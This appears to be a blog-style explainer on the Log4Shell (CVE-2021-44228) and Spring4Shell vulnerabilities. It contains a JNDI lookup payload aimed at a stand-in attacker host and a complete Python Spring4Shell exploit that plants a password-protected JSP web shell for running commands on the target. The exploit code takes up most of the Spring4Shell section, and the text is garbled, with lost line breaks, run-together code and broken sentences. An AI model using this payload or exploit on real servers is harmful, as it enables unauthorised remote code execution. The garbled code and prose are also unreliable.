Log4j is a logging framework written in Java, distributed under the Apache License since 1996 that offers mechanisms to directly log information such as databases, files, consoles, syslogs etc.. It has three components (loggers, appenders and layouts), which are responsible for capturing log information, publishing that information and formatting it in different styles.
It's utilized in many software programs used today and with over 3 billion devices worldwide; which means the attack surface on a 0day from this framework is huge. It looks for patterns of information like , ${ENV:HOSTNAME}, and parses that information to enrich data.
${jndi:ldap://ATTACKER\a}
CVE-2021-44228 is dangerous. The Java Naming and Directory Interface (JNDI) could be used to access resources it shouldn't and that means syntax could be executed the way it is in log files. Furthermore, this syntax could be used wherever data is logged by an application, which makes the scope of the damage currently unknown but critical.
An open source foundation for Java and with JDK9+. Attackers could gain access to the AccessLogValve object through parameter binding features and use field values to trigger the pipeline mechanism, which can write to a file in an arbitrary path under specific conditions.Conditions:
JDK 9.0+
Spring framework/derivative framework spring-beans-*.jar exists
#!/usr/bin/env python3# Spring4Shell Exploit# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/# Modified by: AG | MuirlandOracleimport requestsimport argparsefrom urllib.parse import urljoindefexploit(url,filename,password,directory): headers ={"suffix":"%><!--//","c1":"Runtime","c2":"<%","DNT":"1","Content-Type":"application/x-www-form-urlencoded"} data = f"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{password}%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/{directory}&class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try: requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False) shellurl =urljoin(url, f"{filename}.jsp") shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)if shellgo.status_code ==200:print(f"Shell Uploaded Successfully!\nYour shell can be found at: {shellurl}?pwd={password}&cmd=whoami")else:print("Exploit failed to upload")exceptExceptionas e:print(e)passif__name__=='__main__': parser = argparse.ArgumentParser(description='Spring4Shell RCE Proof of Concept') parser.add_argument('url', help='Target URL') parser.add_argument("-f","--filename", help="Name of the file to upload (Default tomcatwar.jsp)", default="tomcatwar.jsp") parser.add_argument("-p","--password", help="Password to protect the shell with (Default: thm)", default="thm") parser.add_argument("-d","--directory", help="The upload path for the file (Default: ROOT)", default="ROOT") args = parser.parse_args()exploit(args.url, args.filename.split(".")[0], args.password, args.directory)